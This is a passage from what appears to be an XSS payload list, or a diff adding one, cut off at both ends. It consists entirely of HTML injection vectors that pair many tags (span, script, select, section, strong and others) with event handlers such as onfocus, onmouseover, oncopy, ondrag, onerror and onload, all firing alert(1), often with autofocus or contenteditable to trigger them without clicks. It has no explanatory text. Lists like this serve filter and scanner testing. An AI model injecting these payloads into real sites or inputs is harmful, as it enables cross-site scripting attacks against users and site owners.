id=x tabindex=1 onfocus=alert(1)></rb> +<rb id=x tabindex=1 onfocusin=alert(1)></rb> +<rb onbeforecopy="alert(1)" contenteditable>test</rb> +<rb onbeforecut="alert(1)" contenteditable>test</rb> +<rb onbeforepaste="alert(1)" contenteditable>test</rb> +<rb onblur=alert(1) tabindex=1 id=x></rb><input autofocus> +<rb onclick="alert(1)">test</rb> +<rb oncontextmenu="alert(1)">test</rb> +<rb oncopy="alert(1)" contenteditable>test</rb> +<rb oncut="alert(1)" contenteditable>test</rb> +<rb ondblclick="alert(1)">test</rb> +<rb onfocusout=alert(1) tabindex=1 id=x></rb><input autofocus> +<rb onkeydown="alert(1)" contenteditable>test</rb> +<rb onkeypress="alert(1)" 
contenteditable>test</rb> +<rb onkeyup="alert(1)" contenteditable>test</rb> +<rb onmousedown="alert(1)">test</rb> +<rb onmouseenter="alert(1)">test</rb> +<rb onmouseleave="alert(1)">test</rb> +<rb onmousemove="alert(1)">test</rb> +<rb onmouseout="alert(1)">test</rb> +<rb onmouseover="alert(1)">test</rb> +<rb onmouseup="alert(1)">test</rb> +<rb onpaste="alert(1)" contenteditable>test</rb> +<rp draggable="true" ondrag="alert(1)">test</rp> +<rp draggable="true" ondragend="alert(1)">test</rp> +<rp draggable="true" ondragenter="alert(1)">test</rp> +<rp draggable="true" ondragleave="alert(1)">test</rp> +<rp draggable="true" ondragstart="alert(1)">test</rp> +<rp id=x tabindex=1 onactivate=alert(1)></rp> +<rp id=x tabindex=1 onbeforeactivate=alert(1)></rp> +<rp id=x tabindex=1 onbeforedeactivate=alert(1)></rp><input autofocus> +<rp id=x tabindex=1 ondeactivate=alert(1)></rp><input id=y autofocus> +<rp id=x tabindex=1 onfocus=alert(1)></rp> +<rp id=x tabindex=1 onfocusin=alert(1)></rp> +<rp onbeforecopy="alert(1)" contenteditable>test</rp> +<rp onbeforecut="alert(1)" contenteditable>test</rp> +<rp onbeforepaste="alert(1)" contenteditable>test</rp> +<rp onblur=alert(1) tabindex=1 id=x></rp><input autofocus> +<rp onclick="alert(1)">test</rp> +<rp oncontextmenu="alert(1)">test</rp> +<rp oncopy="alert(1)" contenteditable>test</rp> +<rp oncut="alert(1)" contenteditable>test</rp> +<rp ondblclick="alert(1)">test</rp> +<rp onfocusout=alert(1) tabindex=1 id=x></rp><input autofocus> +<rp onkeydown="alert(1)" contenteditable>test</rp> +<rp onkeypress="alert(1)" contenteditable>test</rp> +<rp onkeyup="alert(1)" contenteditable>test</rp> +<rp onmousedown="alert(1)">test</rp> +<rp onmouseenter="alert(1)">test</rp> +<rp onmouseleave="alert(1)">test</rp> +<rp onmousemove="alert(1)">test</rp> +<rp onmouseout="alert(1)">test</rp> +<rp onmouseover="alert(1)">test</rp> +<rp onmouseup="alert(1)">test</rp> +<rp onpaste="alert(1)" contenteditable>test</rp> +<rt draggable="true" 
ondrag="alert(1)">test</rt> +<rt draggable="true" ondragend="alert(1)">test</rt> +<rt draggable="true" ondragenter="alert(1)">test</rt> +<rt draggable="true" ondragleave="alert(1)">test</rt> +<rt draggable="true" ondragstart="alert(1)">test</rt> +<rt id=x tabindex=1 onactivate=alert(1)></rt> +<rt id=x tabindex=1 onbeforeactivate=alert(1)></rt> +<rt id=x tabindex=1 onbeforedeactivate=alert(1)></rt><input autofocus> +<rt id=x tabindex=1 ondeactivate=alert(1)></rt><input id=y autofocus> +<rt id=x tabindex=1 onfocus=alert(1)></rt> +<rt id=x tabindex=1 onfocusin=alert(1)></rt> +<rt onbeforecopy="alert(1)" contenteditable>test</rt> +<rt onbeforecut="alert(1)" contenteditable>test</rt> +<rt onbeforepaste="alert(1)" contenteditable>test</rt> +<rt onblur=alert(1) tabindex=1 id=x></rt><input autofocus> +<rt onclick="alert(1)">test</rt> +<rt oncontextmenu="alert(1)">test</rt> +<rt oncopy="alert(1)" contenteditable>test</rt> +<rt oncut="alert(1)" contenteditable>test</rt> +<rt ondblclick="alert(1)">test</rt> +<rt onfocusout=alert(1) tabindex=1 id=x></rt><input autofocus> +<rt onkeydown="alert(1)" contenteditable>test</rt> +<rt onkeypress="alert(1)" contenteditable>test</rt> +<rt onkeyup="alert(1)" contenteditable>test</rt> +<rt onmousedown="alert(1)">test</rt> +<rt onmouseenter="alert(1)">test</rt> +<rt onmouseleave="alert(1)">test</rt> +<rt onmousemove="alert(1)">test</rt> +<rt onmouseout="alert(1)">test</rt> +<rt onmouseover="alert(1)">test</rt> +<rt onmouseup="alert(1)">test</rt> +<rt onpaste="alert(1)" contenteditable>test</rt> +<rtc draggable="true" ondrag="alert(1)">test</rtc> +<rtc draggable="true" ondragend="alert(1)">test</rtc> +<rtc draggable="true" ondragenter="alert(1)">test</rtc> +<rtc draggable="true" ondragleave="alert(1)">test</rtc> +<rtc draggable="true" ondragstart="alert(1)">test</rtc> +<rtc id=x tabindex=1 onactivate=alert(1)></rtc> +<rtc id=x tabindex=1 onbeforeactivate=alert(1)></rtc> +<rtc id=x tabindex=1 onbeforedeactivate=alert(1)></rtc><input 
autofocus> +<rtc id=x tabindex=1 ondeactivate=alert(1)></rtc><input id=y autofocus> +<rtc id=x tabindex=1 onfocus=alert(1)></rtc> +<rtc id=x tabindex=1 onfocusin=alert(1)></rtc> +<rtc onbeforecopy="alert(1)" contenteditable>test</rtc> +<rtc onbeforecut="alert(1)" contenteditable>test</rtc> +<rtc onbeforepaste="alert(1)" contenteditable>test</rtc> +<rtc onblur=alert(1) tabindex=1 id=x></rtc><input autofocus> +<rtc onclick="alert(1)">test</rtc> +<rtc oncontextmenu="alert(1)">test</rtc> +<rtc oncopy="alert(1)" contenteditable>test</rtc> +<rtc oncut="alert(1)" contenteditable>test</rtc> +<rtc ondblclick="alert(1)">test</rtc> +<rtc onfocusout=alert(1) tabindex=1 id=x></rtc><input autofocus> +<rtc onkeydown="alert(1)" contenteditable>test</rtc> +<rtc onkeypress="alert(1)" contenteditable>test</rtc> +<rtc onkeyup="alert(1)" contenteditable>test</rtc> +<rtc onmousedown="alert(1)">test</rtc> +<rtc onmouseenter="alert(1)">test</rtc> +<rtc onmouseleave="alert(1)">test</rtc> +<rtc onmousemove="alert(1)">test</rtc> +<rtc onmouseout="alert(1)">test</rtc> +<rtc onmouseover="alert(1)">test</rtc> +<rtc onmouseup="alert(1)">test</rtc> +<rtc onpaste="alert(1)" contenteditable>test</rtc> +<ruby draggable="true" ondrag="alert(1)">test</ruby> +<ruby draggable="true" ondragend="alert(1)">test</ruby> +<ruby draggable="true" ondragenter="alert(1)">test</ruby> +<ruby draggable="true" ondragleave="alert(1)">test</ruby> +<ruby draggable="true" ondragstart="alert(1)">test</ruby> +<ruby id=x tabindex=1 onactivate=alert(1)></ruby> +<ruby id=x tabindex=1 onbeforeactivate=alert(1)></ruby> +<ruby id=x tabindex=1 onbeforedeactivate=alert(1)></ruby><input autofocus> +<ruby id=x tabindex=1 ondeactivate=alert(1)></ruby><input id=y autofocus> +<ruby id=x tabindex=1 onfocus=alert(1)></ruby> +<ruby id=x tabindex=1 onfocusin=alert(1)></ruby> +<ruby onbeforecopy="alert(1)" contenteditable>test</ruby> +<ruby onbeforecut="alert(1)" contenteditable>test</ruby> +<ruby onbeforepaste="alert(1)" 
contenteditable>test</ruby> +<ruby onblur=alert(1) tabindex=1 id=x></ruby><input autofocus> +<ruby onclick="alert(1)">test</ruby> +<ruby oncontextmenu="alert(1)">test</ruby> +<ruby oncopy="alert(1)" contenteditable>test</ruby> +<ruby oncut="alert(1)" contenteditable>test</ruby> +<ruby ondblclick="alert(1)">test</ruby> +<ruby onfocusout=alert(1) tabindex=1 id=x></ruby><input autofocus> +<ruby onkeydown="alert(1)" contenteditable>test</ruby> +<ruby onkeypress="alert(1)" contenteditable>test</ruby> +<ruby onkeyup="alert(1)" contenteditable>test</ruby> +<ruby onmousedown="alert(1)">test</ruby> +<ruby onmouseenter="alert(1)">test</ruby> +<ruby onmouseleave="alert(1)">test</ruby> +<ruby onmousemove="alert(1)">test</ruby> +<ruby onmouseout="alert(1)">test</ruby> +<ruby onmouseover="alert(1)">test</ruby> +<ruby onmouseup="alert(1)">test</ruby> +<ruby onpaste="alert(1)" contenteditable>test</ruby> +<s draggable="true" ondrag="alert(1)">test</s> +<s draggable="true" ondragend="alert(1)">test</s> +<s draggable="true" ondragenter="alert(1)">test</s> +<s draggable="true" ondragleave="alert(1)">test</s> +<s draggable="true" ondragstart="alert(1)">test</s> +<s id=x tabindex=1 onactivate=alert(1)></s> +<s id=x tabindex=1 onbeforeactivate=alert(1)></s> +<s id=x tabindex=1 onbeforedeactivate=alert(1)></s><input autofocus> +<s id=x tabindex=1 ondeactivate=alert(1)></s><input id=y autofocus> +<s id=x tabindex=1 onfocus=alert(1)></s> +<s id=x tabindex=1 onfocusin=alert(1)></s> +<s onbeforecopy="alert(1)" contenteditable>test</s> +<s onbeforecut="alert(1)" contenteditable>test</s> +<s onbeforepaste="alert(1)" contenteditable>test</s> +<s onblur=alert(1) tabindex=1 id=x></s><input autofocus> +<s onclick="alert(1)">test</s> +<s oncontextmenu="alert(1)">test</s> +<s oncopy="alert(1)" contenteditable>test</s> +<s oncut="alert(1)" contenteditable>test</s> +<s ondblclick="alert(1)">test</s> +<s onfocusout=alert(1) tabindex=1 id=x></s><input autofocus> +<s onkeydown="alert(1)" 
contenteditable>test</s> +<s onkeypress="alert(1)" contenteditable>test</s> +<s onkeyup="alert(1)" contenteditable>test</s> +<s onmousedown="alert(1)">test</s> +<s onmouseenter="alert(1)">test</s> +<s onmouseleave="alert(1)">test</s> +<s onmousemove="alert(1)">test</s> +<s onmouseout="alert(1)">test</s> +<s onmouseover="alert(1)">test</s> +<s onmouseup="alert(1)">test</s> +<s onpaste="alert(1)" contenteditable>test</s> +<samp draggable="true" ondrag="alert(1)">test</samp> +<samp draggable="true" ondragend="alert(1)">test</samp> +<samp draggable="true" ondragenter="alert(1)">test</samp> +<samp draggable="true" ondragleave="alert(1)">test</samp> +<samp draggable="true" ondragstart="alert(1)">test</samp> +<samp id=x tabindex=1 onactivate=alert(1)></samp> +<samp id=x tabindex=1 onbeforeactivate=alert(1)></samp> +<samp id=x tabindex=1 onbeforedeactivate=alert(1)></samp><input autofocus> +<samp id=x tabindex=1 ondeactivate=alert(1)></samp><input id=y autofocus> +<samp id=x tabindex=1 onfocus=alert(1)></samp> +<samp id=x tabindex=1 onfocusin=alert(1)></samp> +<samp onbeforecopy="alert(1)" contenteditable>test</samp> +<samp onbeforecut="alert(1)" contenteditable>test</samp> +<samp onbeforepaste="alert(1)" contenteditable>test</samp> +<samp onblur=alert(1) tabindex=1 id=x></samp><input autofocus> +<samp onclick="alert(1)">test</samp> +<samp oncontextmenu="alert(1)">test</samp> +<samp oncopy="alert(1)" contenteditable>test</samp> +<samp oncut="alert(1)" contenteditable>test</samp> +<samp ondblclick="alert(1)">test</samp> +<samp onfocusout=alert(1) tabindex=1 id=x></samp><input autofocus> +<samp onkeydown="alert(1)" contenteditable>test</samp> +<samp onkeypress="alert(1)" contenteditable>test</samp> +<samp onkeyup="alert(1)" contenteditable>test</samp> +<samp onmousedown="alert(1)">test</samp> +<samp onmouseenter="alert(1)">test</samp> +<samp onmouseleave="alert(1)">test</samp> +<samp onmousemove="alert(1)">test</samp> +<samp onmouseout="alert(1)">test</samp> +<samp 
onmouseover="alert(1)">test</samp> +<samp onmouseup="alert(1)">test</samp> +<samp onpaste="alert(1)" contenteditable>test</samp> +<script draggable="true" ondrag="alert(1)">test</script> +<script draggable="true" ondragend="alert(1)">test</script> +<script draggable="true" ondragenter="alert(1)">test</script> +<script draggable="true" ondragleave="alert(1)">test</script> +<script draggable="true" ondragstart="alert(1)">test</script> +<script id=x tabindex=1 onactivate=alert(1)></script> +<script id=x tabindex=1 onbeforeactivate=alert(1)></script> +<script id=x tabindex=1 onbeforedeactivate=alert(1)></script><input autofocus> +<script id=x tabindex=1 ondeactivate=alert(1)></script><input id=y autofocus> +<script id=x tabindex=1 onfocus=alert(1)></script> +<script id=x tabindex=1 onfocusin=alert(1)></script> +<script onbeforecopy="alert(1)" contenteditable>test</script> +<script onbeforecut="alert(1)" contenteditable>test</script> +<script onbeforepaste="alert(1)" contenteditable>test</script> +<script onblur=alert(1) tabindex=1 id=x></script><input autofocus> +<script onclick="alert(1)">test</script> +<script oncontextmenu="alert(1)">test</script> +<script oncopy="alert(1)" contenteditable>test</script> +<script oncut="alert(1)" contenteditable>test</script> +<script ondblclick="alert(1)">test</script> +<script onerror=alert(1) src=/></script> +<script onfocusout=alert(1) tabindex=1 id=x></script><input autofocus> +<script onkeydown="alert(1)" contenteditable>test</script> +<script onkeypress="alert(1)" contenteditable>test</script> +<script onkeyup="alert(1)" contenteditable>test</script> +<script onload=alert(1) src=validjs.js></script> +<script onmousedown="alert(1)">test</script> +<script onmouseenter="alert(1)">test</script> +<script onmouseleave="alert(1)">test</script> +<script onmousemove="alert(1)">test</script> +<script onmouseout="alert(1)">test</script> +<script onmouseover="alert(1)">test</script> +<script onmouseup="alert(1)">test</script> +<script 
onpaste="alert(1)" contenteditable>test</script> +<script onreadystatechange=alert(1)></script> +<section draggable="true" ondrag="alert(1)">test</section> +<section draggable="true" ondragend="alert(1)">test</section> +<section draggable="true" ondragenter="alert(1)">test</section> +<section draggable="true" ondragleave="alert(1)">test</section> +<section draggable="true" ondragstart="alert(1)">test</section> +<section id=x tabindex=1 onactivate=alert(1)></section> +<section id=x tabindex=1 onbeforeactivate=alert(1)></section> +<section id=x tabindex=1 onbeforedeactivate=alert(1)></section><input autofocus> +<section id=x tabindex=1 ondeactivate=alert(1)></section><input id=y autofocus> +<section id=x tabindex=1 onfocus=alert(1)></section> +<section id=x tabindex=1 onfocusin=alert(1)></section> +<section onbeforecopy="alert(1)" contenteditable>test</section> +<section onbeforecut="alert(1)" contenteditable>test</section> +<section onbeforepaste="alert(1)" contenteditable>test</section> +<section onblur=alert(1) tabindex=1 id=x></section><input autofocus> +<section onclick="alert(1)">test</section> +<section oncontextmenu="alert(1)">test</section> +<section oncopy="alert(1)" contenteditable>test</section> +<section oncut="alert(1)" contenteditable>test</section> +<section ondblclick="alert(1)">test</section> +<section onfocusout=alert(1) tabindex=1 id=x></section><input autofocus> +<section onkeydown="alert(1)" contenteditable>test</section> +<section onkeypress="alert(1)" contenteditable>test</section> +<section onkeyup="alert(1)" contenteditable>test</section> +<section onmousedown="alert(1)">test</section> +<section onmouseenter="alert(1)">test</section> +<section onmouseleave="alert(1)">test</section> +<section onmousemove="alert(1)">test</section> +<section onmouseout="alert(1)">test</section> +<section onmouseover="alert(1)">test</section> +<section onmouseup="alert(1)">test</section> +<section onpaste="alert(1)" contenteditable>test</section> +<select 
autofocus onfocus=alert(1)> +<select autofocus onfocusin=alert(1)> +<select draggable="true" ondrag="alert(1)">test</select> +<select draggable="true" ondragend="alert(1)">test</select> +<select draggable="true" ondragenter="alert(1)">test</select> +<select draggable="true" ondragleave="alert(1)">test</select> +<select draggable="true" ondragstart="alert(1)">test</select> +<select id=x tabindex=1 onactivate=alert(1)></select> +<select id=x tabindex=1 onbeforeactivate=alert(1)></select> +<select id=x tabindex=1 onbeforedeactivate=alert(1)></select><input autofocus> +<select id=x tabindex=1 ondeactivate=alert(1)></select><input id=y autofocus> +<select onbeforecopy="alert(1)" contenteditable>test</select> +<select onbeforecut="alert(1)" contenteditable>test</select> +<select onbeforepaste="alert(1)" contenteditable>test</select> +<select onblur=alert(1) id=x></select><input autofocus> +<select onchange=alert(1)><option>change me</option><option>XSS</option></select> +<select onclick="alert(1)">test</select> +<select oncontextmenu="alert(1)">test</select> +<select oncopy="alert(1)" contenteditable>test</select> +<select oncut="alert(1)" contenteditable>test</select> +<select ondblclick="alert(1)">test</select> +<select onfocusout=alert(1) id=x></select><input autofocus> +<select onkeydown="alert(1)" contenteditable>test</select> +<select onkeypress="alert(1)" contenteditable>test</select> +<select onkeyup="alert(1)" contenteditable>test</select> +<select onmousedown="alert(1)">test</select> +<select onmouseenter="alert(1)">test</select> +<select onmouseleave="alert(1)">test</select> +<select onmousemove="alert(1)">test</select> +<select onmouseout="alert(1)">test</select> +<select onmouseover="alert(1)">test</select> +<select onmouseup="alert(1)">test</select> +<select onpaste="alert(1)" contenteditable>test</select> +<shadow draggable="true" ondrag="alert(1)">test</shadow> +<shadow draggable="true" ondragend="alert(1)">test</shadow> +<shadow draggable="true" 
ondragenter="alert(1)">test</shadow> +<shadow draggable="true" ondragleave="alert(1)">test</shadow> +<shadow draggable="true" ondragstart="alert(1)">test</shadow> +<shadow id=x tabindex=1 onactivate=alert(1)></shadow> +<shadow id=x tabindex=1 onbeforeactivate=alert(1)></shadow> +<shadow id=x tabindex=1 onbeforedeactivate=alert(1)></shadow><input autofocus> +<shadow id=x tabindex=1 ondeactivate=alert(1)></shadow><input id=y autofocus> +<shadow id=x tabindex=1 onfocus=alert(1)></shadow> +<shadow id=x tabindex=1 onfocusin=alert(1)></shadow> +<shadow onbeforecopy="alert(1)" contenteditable>test</shadow> +<shadow onbeforecut="alert(1)" contenteditable>test</shadow> +<shadow onbeforepaste="alert(1)" contenteditable>test</shadow> +<shadow onblur=alert(1) tabindex=1 id=x></shadow><input autofocus> +<shadow onclick="alert(1)">test</shadow> +<shadow oncontextmenu="alert(1)">test</shadow> +<shadow oncopy="alert(1)" contenteditable>test</shadow> +<shadow oncut="alert(1)" contenteditable>test</shadow> +<shadow ondblclick="alert(1)">test</shadow> +<shadow onfocusout=alert(1) tabindex=1 id=x></shadow><input autofocus> +<shadow onkeydown="alert(1)" contenteditable>test</shadow> +<shadow onkeypress="alert(1)" contenteditable>test</shadow> +<shadow onkeyup="alert(1)" contenteditable>test</shadow> +<shadow onmousedown="alert(1)">test</shadow> +<shadow onmouseenter="alert(1)">test</shadow> +<shadow onmouseleave="alert(1)">test</shadow> +<shadow onmousemove="alert(1)">test</shadow> +<shadow onmouseout="alert(1)">test</shadow> +<shadow onmouseover="alert(1)">test</shadow> +<shadow onmouseup="alert(1)">test</shadow> +<shadow onpaste="alert(1)" contenteditable>test</shadow> +<slot draggable="true" ondrag="alert(1)">test</slot> +<slot draggable="true" ondragend="alert(1)">test</slot> +<slot draggable="true" ondragenter="alert(1)">test</slot> +<slot draggable="true" ondragleave="alert(1)">test</slot> +<slot draggable="true" ondragstart="alert(1)">test</slot> +<slot id=x tabindex=1 
onactivate=alert(1)></slot> +<slot id=x tabindex=1 onbeforeactivate=alert(1)></slot> +<slot id=x tabindex=1 onbeforedeactivate=alert(1)></slot><input autofocus> +<slot id=x tabindex=1 ondeactivate=alert(1)></slot><input id=y autofocus> +<slot id=x tabindex=1 onfocus=alert(1)></slot> +<slot id=x tabindex=1 onfocusin=alert(1)></slot> +<slot onbeforecopy="alert(1)" contenteditable>test</slot> +<slot onbeforecut="alert(1)" contenteditable>test</slot> +<slot onbeforepaste="alert(1)" contenteditable>test</slot> +<slot onblur=alert(1) tabindex=1 id=x></slot><input autofocus> +<slot onclick="alert(1)">test</slot> +<slot oncontextmenu="alert(1)">test</slot> +<slot oncopy="alert(1)" contenteditable>test</slot> +<slot oncut="alert(1)" contenteditable>test</slot> +<slot ondblclick="alert(1)">test</slot> +<slot onfocusout=alert(1) tabindex=1 id=x></slot><input autofocus> +<slot onkeydown="alert(1)" contenteditable>test</slot> +<slot onkeypress="alert(1)" contenteditable>test</slot> +<slot onkeyup="alert(1)" contenteditable>test</slot> +<slot onmousedown="alert(1)">test</slot> +<slot onmouseenter="alert(1)">test</slot> +<slot onmouseleave="alert(1)">test</slot> +<slot onmousemove="alert(1)">test</slot> +<slot onmouseout="alert(1)">test</slot> +<slot onmouseover="alert(1)">test</slot> +<slot onmouseup="alert(1)">test</slot> +<slot onpaste="alert(1)" contenteditable>test</slot> +<small draggable="true" ondrag="alert(1)">test</small> +<small draggable="true" ondragend="alert(1)">test</small> +<small draggable="true" ondragenter="alert(1)">test</small> +<small draggable="true" ondragleave="alert(1)">test</small> +<small draggable="true" ondragstart="alert(1)">test</small> +<small id=x tabindex=1 onactivate=alert(1)></small> +<small id=x tabindex=1 onbeforeactivate=alert(1)></small> +<small id=x tabindex=1 onbeforedeactivate=alert(1)></small><input autofocus> +<small id=x tabindex=1 ondeactivate=alert(1)></small><input id=y autofocus> +<small id=x tabindex=1 onfocus=alert(1)></small> 
+<small id=x tabindex=1 onfocusin=alert(1)></small> +<small onbeforecopy="alert(1)" contenteditable>test</small> +<small onbeforecut="alert(1)" contenteditable>test</small> +<small onbeforepaste="alert(1)" contenteditable>test</small> +<small onblur=alert(1) tabindex=1 id=x></small><input autofocus> +<small onclick="alert(1)">test</small> +<small oncontextmenu="alert(1)">test</small> +<small oncopy="alert(1)" contenteditable>test</small> +<small oncut="alert(1)" contenteditable>test</small> +<small ondblclick="alert(1)">test</small> +<small onfocusout=alert(1) tabindex=1 id=x></small><input autofocus> +<small onkeydown="alert(1)" contenteditable>test</small> +<small onkeypress="alert(1)" contenteditable>test</small> +<small onkeyup="alert(1)" contenteditable>test</small> +<small onmousedown="alert(1)">test</small> +<small onmouseenter="alert(1)">test</small> +<small onmouseleave="alert(1)">test</small> +<small onmousemove="alert(1)">test</small> +<small onmouseout="alert(1)">test</small> +<small onmouseover="alert(1)">test</small> +<small onmouseup="alert(1)">test</small> +<small onpaste="alert(1)" contenteditable>test</small> +<source draggable="true" ondrag="alert(1)">test</source> +<source draggable="true" ondragend="alert(1)">test</source> +<source draggable="true" ondragenter="alert(1)">test</source> +<source draggable="true" ondragleave="alert(1)">test</source> +<source draggable="true" ondragstart="alert(1)">test</source> +<source id=x tabindex=1 onactivate=alert(1)></source> +<source id=x tabindex=1 onbeforeactivate=alert(1)></source> +<source id=x tabindex=1 onbeforedeactivate=alert(1)></source><input autofocus> +<source id=x tabindex=1 ondeactivate=alert(1)></source><input id=y autofocus> +<source id=x tabindex=1 onfocus=alert(1)></source> +<source id=x tabindex=1 onfocusin=alert(1)></source> +<source onbeforecopy="alert(1)" contenteditable>test</source> +<source onbeforecut="alert(1)" contenteditable>test</source> +<source onbeforepaste="alert(1)" 
contenteditable>test</source> +<source onblur=alert(1) tabindex=1 id=x></source><input autofocus> +<source onclick="alert(1)">test</source> +<source oncontextmenu="alert(1)">test</source> +<source oncopy="alert(1)" contenteditable>test</source> +<source oncut="alert(1)" contenteditable>test</source> +<source ondblclick="alert(1)">test</source> +<source onfocusout=alert(1) tabindex=1 id=x></source><input autofocus> +<source onkeydown="alert(1)" contenteditable>test</source> +<source onkeypress="alert(1)" contenteditable>test</source> +<source onkeyup="alert(1)" contenteditable>test</source> +<source onmousedown="alert(1)">test</source> +<source onmouseenter="alert(1)">test</source> +<source onmouseleave="alert(1)">test</source> +<source onmousemove="alert(1)">test</source> +<source onmouseout="alert(1)">test</source> +<source onmouseover="alert(1)">test</source> +<source onmouseup="alert(1)">test</source> +<source onpaste="alert(1)" contenteditable>test</source> +<spacer draggable="true" ondrag="alert(1)">test</spacer> +<spacer draggable="true" ondragend="alert(1)">test</spacer> +<spacer draggable="true" ondragenter="alert(1)">test</spacer> +<spacer draggable="true" ondragleave="alert(1)">test</spacer> +<spacer draggable="true" ondragstart="alert(1)">test</spacer> +<spacer id=x tabindex=1 onactivate=alert(1)></spacer> +<spacer id=x tabindex=1 onbeforeactivate=alert(1)></spacer> +<spacer id=x tabindex=1 onbeforedeactivate=alert(1)></spacer><input autofocus> +<spacer id=x tabindex=1 ondeactivate=alert(1)></spacer><input id=y autofocus> +<spacer id=x tabindex=1 onfocus=alert(1)></spacer> +<spacer id=x tabindex=1 onfocusin=alert(1)></spacer> +<spacer onbeforecopy="alert(1)" contenteditable>test</spacer> +<spacer onbeforecut="alert(1)" contenteditable>test</spacer> +<spacer onbeforepaste="alert(1)" contenteditable>test</spacer> +<spacer onblur=alert(1) tabindex=1 id=x></spacer><input autofocus> +<spacer onclick="alert(1)">test</spacer> +<spacer 
oncontextmenu="alert(1)">test</spacer> +<spacer oncopy="alert(1)" contenteditable>test</spacer> +<spacer oncut="alert(1)" contenteditable>test</spacer> +<spacer ondblclick="alert(1)">test</spacer> +<spacer onfocusout=alert(1) tabindex=1 id=x></spacer><input autofocus> +<spacer onkeydown="alert(1)" contenteditable>test</spacer> +<spacer onkeypress="alert(1)" contenteditable>test</spacer> +<spacer onkeyup="alert(1)" contenteditable>test</spacer> +<spacer onmousedown="alert(1)">test</spacer> +<spacer onmouseenter="alert(1)">test</spacer> +<spacer onmouseleave="alert(1)">test</spacer> +<spacer onmousemove="alert(1)">test</spacer> +<spacer onmouseout="alert(1)">test</spacer> +<spacer onmouseover="alert(1)">test</spacer> +<spacer onmouseup="alert(1)">test</spacer> +<spacer onpaste="alert(1)" contenteditable>test</spacer> +<span draggable="true" ondrag="alert(1)">test</span> +<span draggable="true" ondragend="alert(1)">test</span> +<span draggable="true" ondragenter="alert(1)">test</span> +<span draggable="true" ondragleave="alert(1)">test</span> +<span draggable="true" ondragstart="alert(1)">test</span> +<span id=x tabindex=1 onactivate=alert(1)></span> +<span id=x tabindex=1 onbeforeactivate=alert(1)></span> +<span id=x tabindex=1 onbeforedeactivate=alert(1)></span><input autofocus> +<span id=x tabindex=1 ondeactivate=alert(1)></span><input id=y autofocus> +<span id=x tabindex=1 onfocus=alert(1)></span> +<span id=x tabindex=1 onfocusin=alert(1)></span> +<span onbeforecopy="alert(1)" contenteditable>test</span> +<span onbeforecut="alert(1)" contenteditable>test</span> +<span onbeforepaste="alert(1)" contenteditable>test</span> +<span onblur=alert(1) tabindex=1 id=x></span><input autofocus> +<span onclick="alert(1)">test</span> +<span oncontextmenu="alert(1)">test</span> +<span oncopy="alert(1)" contenteditable>test</span> +<span oncut="alert(1)" contenteditable>test</span> +<span ondblclick="alert(1)">test</span> +<span onfocusout=alert(1) tabindex=1 id=x></span><input 
autofocus> +<span onkeydown="alert(1)" contenteditable>test</span> +<span onkeypress="alert(1)" contenteditable>test</span> +<span onkeyup="alert(1)" contenteditable>test</span> +<span onmousedown="alert(1)">test</span> +<span onmouseenter="alert(1)">test</span> +<span onmouseleave="alert(1)">test</span> +<span onmousemove="alert(1)">test</span> +<span onmouseout="alert(1)">test</span> +<span onmouseover="alert(1)">test</span> +<span onmouseup="alert(1)">test</span> +<span onpaste="alert(1)" contenteditable>test</span> +<strike draggable="true" ondrag="alert(1)">test</strike> +<strike draggable="true" ondragend="alert(1)">test</strike> +<strike draggable="true" ondragenter="alert(1)">test</strike> +<strike draggable="true" ondragleave="alert(1)">test</strike> +<strike draggable="true" ondragstart="alert(1)">test</strike> +<strike id=x tabindex=1 onactivate=alert(1)></strike> +<strike id=x tabindex=1 onbeforeactivate=alert(1)></strike> +<strike id=x tabindex=1 onbeforedeactivate=alert(1)></strike><input autofocus> +<strike id=x tabindex=1 ondeactivate=alert(1)></strike><input id=y autofocus> +<strike id=x tabindex=1 onfocus=alert(1)></strike> +<strike id=x tabindex=1 onfocusin=alert(1)></strike> +<strike onbeforecopy="alert(1)" contenteditable>test</strike> +<strike onbeforecut="alert(1)" contenteditable>test</strike> +<strike onbeforepaste="alert(1)" contenteditable>test</strike> +<strike onblur=alert(1) tabindex=1 id=x></strike><input autofocus> +<strike onclick="alert(1)">test</strike> +<strike oncontextmenu="alert(1)">test</strike> +<strike oncopy="alert(1)" contenteditable>test</strike> +<strike oncut="alert(1)" contenteditable>test</strike> +<strike ondblclick="alert(1)">test</strike> +<strike onfocusout=alert(1) tabindex=1 id=x></strike><input autofocus> +<strike onkeydown="alert(1)" contenteditable>test</strike> +<strike onkeypress="alert(1)" contenteditable>test</strike> +<strike onkeyup="alert(1)" contenteditable>test</strike> +<strike 
onmousedown="alert(1)">test</strike> +<strike onmouseenter="alert(1)">test</strike> +<strike onmouseleave="alert(1)">test</strike> +<strike onmousemove="alert(1)">test</strike> +<strike onmouseout="alert(1)">test</strike> +<strike onmouseover="alert(1)">test</strike> +<strike onmouseup="alert(1)">test</strike> +<strike onpaste="alert(1)" contenteditable>test</strike> +<strong draggable="true" ondrag="alert(1)">test</strong> +<strong draggable="true" ondragend="alert(1)">test</strong> +<strong draggable="true" ondragenter="alert(1)">test</strong> +<strong draggable="true" ondragleave="alert(1)">test</strong> +<strong draggable="true" ondragstart="alert(1)">test</strong> +<strong id=x tabindex=1 onactivate=alert(1)></strong> +<strong id=x tabindex=1 onbeforeactivate=alert(1)></strong> +<strong id=x tabindex=1 onbeforedeactivate=alert(1)></strong><input autofocus> +<strong id=x tabindex=1 ondeactivate=alert(1)></strong><input id=y autofocus> +<strong id=x tabindex=1 onfocus=alert(1)></strong> +<strong id=x tabindex=1 onfocusin=alert(1)></strong> +<strong onbeforecopy="alert(1)" contenteditable>test</strong> +<strong onbeforecut="alert(1)" contenteditable>test</strong> +<strong onbeforepaste="alert(1)" contenteditable>test</strong> +<strong onblur=alert(1) tabindex=1 id=x></strong><input autofocus> +<strong onclick="alert(1)">test</strong> +<strong oncontextmenu="alert(1)">test</strong> +<strong oncopy="alert(1)" contenteditable>test</strong> +<strong oncut="alert(1)" contenteditable>test</strong> +<strong ondblclick="alert(1)">test</strong> +<strong onfocusout=alert(1) tabindex=1 id=x></strong><input autofocus> +<strong onkeydown="alert(1)" contenteditable>test</strong> +<strong onkeypress="alert(1)" contenteditable>test</strong> +<strong onkeyup="alert(1)" contenteditable>test</strong> +<strong onmousedown="alert(1)">test</strong> +<strong onmouseenter="alert(1)">test</strong> +<strong onmouseleave="alert(1)">test</strong> +<strong 
